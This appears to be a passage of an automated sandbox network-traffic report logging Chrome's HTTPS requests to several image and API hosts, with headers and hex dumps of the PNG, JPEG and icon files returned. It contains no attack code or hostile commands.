                                                                                                                                                          Data Ascii: PNGIHDR^j59 IDATx^xG_feT[Cq26G4X4g=`l~m;}m60}cU*I:T+3{**+XFU|Q|p|=?<p8<9(HvwGc$H@QcoR9


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          340192.168.2.55009490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:10 UTC611OUTGET /pc/image-pc/index/312/parner/logo_bolin.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:10 UTC615INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:10 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 5512
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:56 GMT
                                                                                                                                                          ETag: "5d71fe88-1588"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE4[3],EU-GER-frankfurt-EDGE5-CACHE6[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE30[4],EU-FRA-paris-GLOBAL1-CACHE6[0,TCP_HIT,3],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465111
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: a8dcd5b52f9d240dbd42d477bda16c80
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 126889
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:10 UTC5512INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 35 00 00 00 32 08 06 00 00 00 fc e3 93 c8 00 00 15 4f 49 44 41 54 68 43 c5 9a 07 74 54 d5 ba 80 bf 53 26 99 09 e9 85 84 84 24 84 d0 42 11 a4 2a 3d 70 83 62 10 04 21 4a 10 a4 eb 43 8a 41 44 89 08 c8 15 a4 28 c2 25 a0 17 90 48 97 2a a0 d2 a4 e8 43 10 11 69 c2 a3 87 40 48 80 84 10 32 49 26 33 73 66 ce 7e eb 4c 40 bd 8a 22 3c d6 7a 67 ad ac c9 9c d9 fb 3f ff b7 f7 df f6 3f 23 71 fb 72 0a 67 13 13 a6 86 2e 97 3d db 64 b2 ec 3e 71 e2 84 57 7c bd 7a 51 aa dd 15 a7 4a ee da 28 6a 12 92 dc 08 45 32 df 9e 52 a2 bb d9 2d 2b ec d1 34 b2 1c 8e d2 cb be be be 05 92 24 89 3b 32 ff bf 5e 25 21 44 25 70 7f bc 73 d7 ae 9e 59 17 b2 cc 35 ab c5 b9 13 93 9e d8 95 97 7f 23 24 eb d2 a5 ea f9 79 b9 41 85 f9 05 5c ce cd e3
                                                                                                                                                          Data Ascii: PNGIHDR52OIDAThCtTS&$B*=pb!JCAD(%H*Ci@H2I&3sf~L@"<zg??#qrg.=d>qW|zQJ(jE2R-+4$;2^%!D%psY5#$yA\


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          341192.168.2.550105108.157.194.574434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:10 UTC370OUTGET /mt-cloud/api/sn.maintain HTTP/1.1
                                                                                                                                                          Host: ocsapi-aws.huayidm.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:10 UTC473INHTTP/1.1 200 OK
                                                                                                                                                          Content-Length: 18
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:10 GMT
                                                                                                                                                          api-elapsed: 0
                                                                                                                                                          x-server: AkamaiNetStorage(jp16)
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                                          Via: 1.1 1b77603a6f6f7fc033b1967170e8a7c0.cloudfront.net (CloudFront)
                                                                                                                                                          X-Amz-Cf-Pop: MXP53-P2
                                                                                                                                                          X-Amz-Cf-Id: RXGwVPY5AzFnaNFztVb9xtHw5EGvDVQIKJjIg57HKvLHo3ibWHGUMA==
                                                                                                                                                          2024-06-09 22:41:10 UTC18INData Raw: 72 65 71 75 65 73 74 2d 65 6d 70 74 79 2d 37 37 37 0a
                                                                                                                                                          Data Ascii: request-empty-777


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          342192.168.2.55010790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:10 UTC641OUTGET /pc/image-pc/video/gd_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb1-hw.qectyoua.com/pc/240516-03/static/css/t4045.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:10 UTC624INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:10 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 17264
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-4370"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE4[4],EU-GER-frankfurt-EDGE5-CACHE4[0,TCP_HIT,2],EU-GER-frankfurt-GLOBAL1-CACHE6[9],EU-GER-frankfurt-GLOBAL1-CACHE4[0,TCP_HIT,8],1.1 google
                                                                                                                                                          X-CCDN-Expires: 826099
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 85048d3261b33753b96627fda5a15b55
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1765901
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:10 UTC15760INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:41:10 UTC1504INData Raw: 2c 49 3c 4b 61 dc 03 06 1c 3b f1 4d 2b b3 2a 91 20 69 8c 70 00 70 0f 8f 79 3c 4f 1e e5 6a f1 cf 79 b8 9f 13 cc 66 ae 71 b6 d9 db eb 7e 65 77 94 93 90 de dd ac 20 e3 ed 32 9b bb b0 63 6c 56 e1 a3 69 24 64 b7 69 66 79 54 b8 89 63 0a 80 6e 34 2b 6d 95 6b 42 22 46 23 40 0c cf 89 8f 19 49 9d bd 4c 00 c1 df 1c 95 fa 3b 8d 2a 32 26 22 47 51 2e ed 80 97 08 87 ff 00 4b 92 71 66 c1 04 c1 f3 6e 0b 63 cb f2 99 63 61 c8 79 1e 36 f7 8a 5c 61 f2 77 57 b2 ad bd ee 57 23 76 9d b9 ae 2e a4 92 e6 f0 5b 23 2b 6d 1d b6 90 80 ab 45 a9 34 b2 6d 2b ce 90 8b c6 24 4c 10 de 98 81 c0 61 17 f9 2a f1 ba a3 1a a6 4d 22 0c 08 2f 9c 89 e3 99 6f 9f 72 98 e0 f3 56 37 79 8e 2f 90 9b 15 2d be 0e cf 87 cd c5 f3 c6 58 94 ed 59 cd d1 32 59 43 24 a4 c8 b1 19 91 97 ba ea 5b 69 52 56 bb b4 f3 b3
                                                                                                                                                          Data Ascii: ,I<Ka;M+* ippy<Ojyfq~ew 2clVi$difyTcn4+mkB"F#@IL;*2&"GQ.Kqfnccay6\awWW#v.[#+mE4m+$La*M"/orV7y/-XY2YC$[iRV


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          343192.168.2.550103202.61.87.2194434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:10 UTC409OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                          Host: yh8613.cc
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          Cookie: com_env=p; p_skin=t3685; skin=t3685; p_sn=uy09; sn=uy09
                                                                                                                                                          2024-06-09 22:41:10 UTC356INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:10 GMT
                                                                                                                                                          Content-Type: image/x-icon
                                                                                                                                                          Content-Length: 140
                                                                                                                                                          Connection: close
                                                                                                                                                          Last-Modified: Wed, 27 Jun 2018 09:11:10 GMT
                                                                                                                                                          ETag: "5b3354ae-8c"
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:41:10 UTC140INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 00 2e 49 44 41 54 78 da ec ce 31 01 00 00 08 03 a0 69 ff ce 33 86 0f 24 60 da e6 d3 e6 99 80 80 80 80 80 80 80 80 80 80 80 80 80 80 c0 09 30 00 40 b4 03 3d e3 0a 67 49 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                          Data Ascii: PNGIHDR szztEXtSoftwareAdobe ImageReadyqe<.IDATx1i3$`0@=gIIENDB`


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          344192.168.2.55010690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:10 UTC641OUTGET /pc/image-pc/video/gc_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb1-hw.qectyoua.com/pc/240516-03/static/css/t4045.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:10 UTC626INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:10 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 25956
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-6564"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE6[6],EU-GER-frankfurt-EDGE5-CACHE2[0,TCP_HIT,2],EU-GER-frankfurt-GLOBAL1-CACHE2[21],EU-GER-frankfurt-GLOBAL1-CACHE2[0,TCP_HIT,20],1.1 google
                                                                                                                                                          X-CCDN-Expires: 826099
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: b3d1aee45854fde44ca27b59f26572a6
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1765901
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:10 UTC15758INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 64 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*Duckydhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:41:10 UTC10198INData Raw: 3f a4 2d 4e 32 c2 23 45 67 e5 69 55 90 39 81 eb 5f 43 4d 5d 3c f6 17 24 fc d5 59 d8 b6 b2 81 b6 ab 86 e3 d8 18 b6 dd 96 fd ad ae d3 6d 93 dc 52 00 14 a5 0d 78 70 e7 a3 b1 26 df 1d 9c d4 76 6c 3b 3e 78 c5 ad 4c f6 bc f6 f7 6e 60 30 cb 9c 93 40 b2 a2 28 3e cf 5d 2a 4c 58 9d ae 68 35 ce 96 35 b6 94 a5 59 a6 4f 73 2b 66 3a d4 a7 5d 49 0b 29 2a 21 20 f0 24 0f 43 af 79 11 28 1b b4 14 a4 cc c9 98 ed 4e b4 dd 1b 07 c8 2e af a5 6e a1 c4 97 d4 54 b7 14 0a 97 c4 fe 2a 9a 73 d3 de 7c 48 a6 c4 69 4f 26 24 8c 6e e7 53 e3 5b 26 e0 37 4b 74 e8 b6 e5 05 39 f3 b2 18 88 1d 0d d3 b6 a9 4e a1 a4 a8 fa 10 3a f4 85 c9 57 53 27 b0 53 73 62 48 b3 28 1a a9 61 f4 6b 4e 10 e4 39 16 43 12 5a 34 71 85 a5 d4 1f f3 24 83 c6 be 87 43 b8 04 10 7a 1a a2 c7 2b 43 2a ca bf 59 58 1f c9 53 a4
                                                                                                                                                          Data Ascii: ?-N2#EgiU9_CM]<$YmRxp&vl;>xLn`0@(>]*LXh55YOs+f:]I)*! $Cy(N.nT*s|HiO&$nS[&7Kt9N:WS'SsbH(akN9CZ4q$Cz+C*YXS


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          345192.168.2.55010890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:10 UTC643OUTGET /pc/image-pc/video/lebo_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb1-hw.qectyoua.com/pc/240516-03/static/css/t4045.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:10 UTC625INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:10 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 17920
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-4600"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE5[6],EU-GER-frankfurt-EDGE5-CACHE2[0,TCP_HIT,5],EU-GER-frankfurt-GLOBAL1-CACHE8[10],EU-GER-frankfurt-GLOBAL1-CACHE8[0,TCP_HIT,8],1.1 google
                                                                                                                                                          X-CCDN-Expires: 826099
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 307446609cd877e1503cb58386883640
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1765901
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:10 UTC15759INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:41:10 UTC2161INData Raw: 76 e5 8b 35 00 68 53 c0 e6 23 15 ac db 45 f6 9d fb d3 09 fc a1 fe 6b c7 b8 ce 5b 8a e3 32 45 e8 58 38 93 72 2e 3d 90 44 83 ff 00 d3 62 a5 40 76 65 b4 d8 29 e8 3f 87 f6 eb 59 fa 63 2f 3a b0 9c 85 b3 20 34 5b c6 3b e2 4f 75 68 e8 1c c4 29 4e 11 36 40 12 f2 7f 14 6e 90 1d c5 54 65 32 50 f2 1d 8f 49 80 81 83 ec ee ee 7a 15 cc 5f 77 75 ad bf d5 c9 91 6d b6 d3 6d ba 9b df 4b 75 69 53 94 1d e6 65 ce df a2 02 e5 55 a9 19 b3 44 47 99 ff 00 48 94 93 9b c5 e4 a7 84 39 8e ce cb c4 ad a4 9f e0 c7 4b 45 2e 1e be 6d e3 af df 6a 6a 52 af 73 38 2f 70 1d 76 14 b6 f2 72 66 a4 37 b5 f8 91 a4 26 23 88 20 e8 4e df 22 94 47 52 05 47 56 ca cd c2 99 87 19 15 33 d9 7d 89 68 46 d7 51 25 c4 3c e9 23 c5 4b 6c 04 9b fd 95 02 85 14 ab 54 b2 a9 45 c5 ea 28 a3 4a 97 1a 0c 77 65 cc 7d 11
                                                                                                                                                          Data Ascii: v5hS#Ek[2EX8r.=Db@ve)?Yc/: 4[;Ouh)N6@nTe2PIz_wummKuiSeUDGH9KE.mjjRs8/pvrf7&# N"GRGV3}hFQ%<#KlTE(Jwe}


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                          346192.168.2.55011290.84.161.22443
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:10 UTC372OUTGET /pc/image-pc/index/312/app/01.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:10 UTC626INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:10 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 88636
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:25 GMT
                                                                                                                                                          ETag: "5d71fe69-15a3c"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE5[2],EU-GER-frankfurt-EDGE5-CACHE1[0,TCP_HIT,0],EU-GER-frankfurt-GLOBAL1-CACHE4[25],EU-GER-frankfurt-GLOBAL1-CACHE1[0,TCP_HIT,21],1.1 google
                                                                                                                                                          X-CCDN-Expires: 1698781
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 8a49a22fd2a419876b09aee8399a114e
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 893226
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:10 UTC15758INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 b5 00 00 01 ad 08 06 00 00 00 50 a1 35 eb 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 00 00 00 00 00 f9 43 bb 7f 00 00 80 00 49 44 41 54 78 da ec fd 77 b8 66 d9 55 df 89 7f 76 38 f1 8d 37 57 0e 5d d5 39 29 27 04 08 90 c0 12 62 6c c2 18 03 1e d2 80 13 38 8c 6d cc d8 23 23 03 b2 0d 4e 78 fc 73 c2 c6 09 c1 8f 60 e3 00 06 21 90 90 90 5a 19 3a 49 9d d4 dd d5 95 eb e6 37 9f bc f7 9e 3f ce 79 df aa ea 6e 05 2b a0 6e 49 eb 79 4e dd aa 5b 37 9c b3 cf da 6b af f0 5d df 25 78 9a c8 67 fc 6d fe d1 02 16 3b ff 9c 9c 7f be 02 c7 67 2e 9f cd f7 7e be 45
                                                                                                                                                          Data Ascii: PNGIHDRP5gAMAa cHRMz&u0`:pQ<bKGDCIDATxwfUv87W]9)'bl8m##Nxs`!Z:I7?yn+nIyN[7k]%xgm;g.~E
